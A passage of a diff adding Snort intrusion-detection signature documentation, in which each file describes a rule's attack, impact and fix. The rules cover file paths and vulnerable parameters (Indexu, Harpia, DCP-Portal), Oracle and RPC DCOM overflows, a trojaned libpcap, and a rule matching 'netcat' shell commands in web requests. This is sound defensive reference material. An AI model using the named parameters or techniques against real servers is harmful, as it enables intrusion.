+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1370.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+1370
+
+--
+Summary:
+Attempted inetd configuration access via web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a 
+webserver. The inetd configuration lists the daemons executed at boot 
+time on a UNIX or Linux based system. The attacker could possibly gain 
+information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 
+'/etc/inetd.conf'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries 
+outside of it's designated web root or cgi-bin. This file may also be 
+requested on a command line should the attacker gain access to the 
+machine. Making the file read only by the superuser on the system will 
+disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000603.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000603
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_paid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_paid.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2447.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2447
+
+--
+Summary:
+This event is generated when an attempt is made to access the servlet
+administration scripts on a Novell Groupwise servlet server.
+
+--
+Impact:
+Possible unauthorized administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the servlet
+administration scripts on a Novell Groupwise servlet server located in /servlet/ServletManager.
+
+The default installation has a known username and password for
+administration of the server.
+
+--
+Affected Systems:
+	Novell Groupwise 6.0
+	Novell Groupwise Enhancement Pack 5.5
+
+--
+Attack Scenarios:
+The attacker might login to the application using the default username
+and password gaining administrative access to the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/821.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+821
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/637.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+637
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2610.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2610
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "cancel_statistics" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
--- /dev/null
+++ b/doc/signatures/1929.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1929
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Trojan server installed via compromised tcpdump or libpcap sources.
+
+--
+Impact:
+Control of the victim host.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Some versions of tcpdump and libpcap were compromised and Trojan code 
+inserted into the source. The compromise is similar to that which 
+affected OpenSSH.
+
+Libpcap is a library used for capturing packets in Snort and other 
+packet sniffing tools.
+
+The Trojaned libpcap source contains code in the configure script that 
+connects to a server at 212.146.0.34 on port 1963. The script then 
+downloads source code for a Trojan horse and compiles it.
+
+Tcpdump is a tool that is used for capturing network traffic, it 
+utilizes libpcap. Some versions of tcpdump also contain the same Trojan.
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan is delivered to the target via the configure script.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the Trojan and kill any associated processes.
+
+Restore the system from known good backups.
+
+Download non-trojaned versions of the library and re-compile.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Houston Linux Users Group
+http://www.hlug.org/trojan/
+
+--
--- /dev/null
+++ b/doc/signatures/423.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+423
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Request datagram.
+
+--
+
+Impact:
+ICMP Mobile Registration Requests were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 35 datagrams should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Request datagrams were developed before the development of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 35 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000675.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000675
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "pfooter.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "pfooter.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/575.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+575
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) admind is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port admind is using.  Attackers can also learn what versions of the admind protocol are accepted by admind.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as admind run.  The admind RPC service is used by some UNIX hosts to perform remote distributed system administration tasks such as adding new users.  If weak authentication is used, it may be possible for a malicious user to perform remote administration.
+
+--
+Affected Systems:
+Any host running admind with weak authentication.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where admind runs.  This may be a precursor to accessing admind.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access admind, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for admind, not probes of the admind service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the admind service itself. An attacker may attempt to go directly to the admind port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS18
+
+
+--
--- /dev/null
+++ b/doc/signatures/2277.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+2277
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a directory
+traversal vulnerability in the cgi application PeopleSoft PeopleBooks.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt is made to exploit a directory
+traversal vulnerability in the cgi application PeopleSoft PeopleBooks.
+The script psdoccgi.exe does not sufficiently check script arguements
+for the "headername" and "footername" variables. An attacker may exploit
+this issue to access files outside the root of the web server.
+
+--
+Affected Systems:
+	PeopleTools versions 8.43 and earlier.
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques to access sensitive
+system files to gain information necessary for further system
+compromise.
+
+--
+Ease of Attack:
+Simple. No exploit code required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2199.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+2199
+
+--
+Summary:
+This event is generated when an attempt is made to access multidiff.cgi on an internal web server. This may indicate an attempt to exploit an information disclosure vulnerability in Mozilla Bonsai 1.3.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Mozilla Bonsai, a CVS query tool, contains an information disclosure vulnerability in multidiff.cgi. An attacker can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which produces an error. The error message shows the full path of the multidiff.cgi file, providing the attacker with information about the server directory structure.
+
+--
+Affected Systems:
+Any system running Mozilla Bonsai 1.3.
+
+--
+Attack Scenarios:
+An attacker sends an erroneous request to multidiff.cgi on the Bonsai server. The error message returns the full path of the script, allowing the attacker to discover more information about the server directory structure for possible use in later attacks.
+
+--
+Ease of Attack:
+Simple. Proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses multidiff.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer build of Mozilla Bonsai 1.3.
+
+If you are running Mozilla Bonsai on Debian 3.0, Debian has provided patches at http://security.debian.org/pool/updates/main/b/bonsai/.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/5517
+
+--
--- /dev/null
+++ b/doc/signatures/1088.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1088
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3297.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3297
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1360.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 1360
+
+-- 
+Summary:
+A web command execution attack involving the use of a
+"netcat" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity or an attempt to gain elevated privileges on the server by using netcat to open another connection.
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "netcat" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "netcat" command may be used establish an interactive shell session to the machine and also transfer files over the connection.
+
+The rule looks for the "netcat" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "netcat" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "netcat" command to move a rootkit to the system.
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+Any string containing 'nc' followed by space in the URL will trigger the alarm.
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3252.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3252
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000626.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000626
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_edit.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2342.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2342
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application DCP-Portal.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+DCP-Portal contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable root when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in a file included from an external source by modifying the
+variable "root" in the editor.php script.
+
+--
+Affected Systems:
+	DCP-Portal 5.0.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the root variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2859.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2859
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_char
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000148.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000148
+
+-- 
+Summary: 
+This event is generated when an attempt is made to perform a directory 
+traversal attack against a system running Barracuda Spam Firewall.
+
+-- 
+Impact: 
+Serious. Unauthorized remote command execution possibly leading to remote 
+access.
+
+--
+Detailed Information:
+User supplied data to script parameters are not properly sanitized, this may 
+permit an unauthorized attacker to execute commands of their choosing on an 
+affected system.
+
+Note:
+In order to utilize this rule, port 8000 must be added to the http_inspect 
+configuration in snort.conf.
+
+--
+Affected Systems:
+Barracuda Spam Firewall 3.1.17 and prior.
+
+--
+Attack Scenarios: 
+An attacker can supply commands as parameters to the img.pl script.
+
+-- 
+Ease of Attack: 
+Simple, exploit software exists but is not necessary.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2845.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2845
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000605.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000605
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_unpaid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
